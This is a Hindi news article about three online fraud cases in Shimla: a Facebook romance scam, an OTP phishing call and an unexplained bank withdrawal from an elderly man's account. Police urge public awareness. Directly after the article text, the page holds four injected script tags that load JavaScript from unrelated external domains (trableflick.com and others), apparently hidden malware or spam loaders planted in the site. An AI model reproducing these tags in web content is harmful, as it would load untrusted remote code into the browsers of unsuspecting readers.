शिमलाः 1 बुजुर्ग और 2 महिलाओं से ऑनलाइन ठगी

<p>&nbsp;<br />
शिमला में ऑनलाइन ठगी के तीन मामले सामने आए हैं। इसमें दो मामलो में महिलाएं ठगी का शिकार हुई हैं। तीनों ही मामलों में ठगी अलग-अलग तरीके से की गई है। हैरानी की बात तो ये है कि पुलिस लगातार इसके प्रति जागरूक कर रही है। इसके बावजूद रुटीन की तकनीक को अपनाते हुए इन मामलों को अंजाम दिया जा रहा है। पहले मामले में युवती से फेसबुक पर दोस्ती कर 45 हजार रुपये ठगे हैं। मशोबरा की रहने वाली युवती ने इस मामले में शिकायत ढली थाने में दर्ज़ करवाई है। इस मामले में युवती ने बताया कि उसकी मुलाकात जिगनेश नाम के लड़के से फेसबुक पर हुई। लड़के ने खुद को विदेशी बताया और लड़की को झांसे में फंसा कर 45 हजार हड़प लिए।</p>

<p>वहीं, दूसरा मामला बालूगंज पुलिस थाना के तहत सामने आया। इसमें सिदराह इमरान ने पुलिस को शिकायत दी है कि उन्हें फोन पर कॉल आई और उनके बैंक खाते के बारे में जानकारी मांगी गई। इस पर महिला ने बैंक की डिटेल से लेकर ओटीपी भी फोन करने वाले के साथ शेयर कर लिया। इसके बाद उनके खाते से 60 हजार रुपये निकाले गए। महिला की शिकायत पर पुलिस ने जांच शुरू कर दी है।</p>

<p>तीसरे मामले में चक्कर में कोर्ट के नजदीक रहने वाले 67 साल के बालकृष्ण के खाते से किसी व्यक्ति ने 1 लाख 60 हजार रुपये निकाल लिए हैं। पुलिस अब इनके खाते को पूरी तरह से खंगालने के लिए बैंक प्रबंधन से रिकॉर्ड मांगने की तैयारी की है। एसपी शिमला ओमापति जम्वाल ने कहा कि इसके प्रति लोगों को जागरूक किया जा रहा है। तीन में से दो मामलों को जागरूकता से रोका जा सकता था। तीसरे मामले में क्या हुआ है, इसकी डिटेल जुटाई जा रही है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581665958354″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

सीएम सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी, आईजएमसी में हुआ उपचार

Shimla: मुख्यमंत्री सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी है। मंगलवार रात को उपचार करवाने…

3 hours ago

पालमपुर कृषि विवि की 112 हेक्टेयर भूमि को पर्यटन विभाग के नाम पर हस्तांतरित करने पर हाईकोर्ट की रोक

  शिमला: चौधरी सरवण कुमार एग्रीकल्चर यूनिवर्सिटी पालमपुर की 112 हेक्टेयर लैंड को पर्यटन विभाग…

3 hours ago

उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी फरार

  UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…

5 hours ago

लापता लेडीज ऑस्कर के लिए नामांकित

  Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…

6 hours ago

हिमाचल में किसानों को 50 प्रतिशत सब्सिडी पर 1100 में मिलेंगे साइकल-हल

  Hamirpur:  प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…

7 hours ago

संजौली कॉलेज में SFI कार्यकर्ताओं और पुलिस बल में धक्का- मुक्की

  Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…

7 hours ago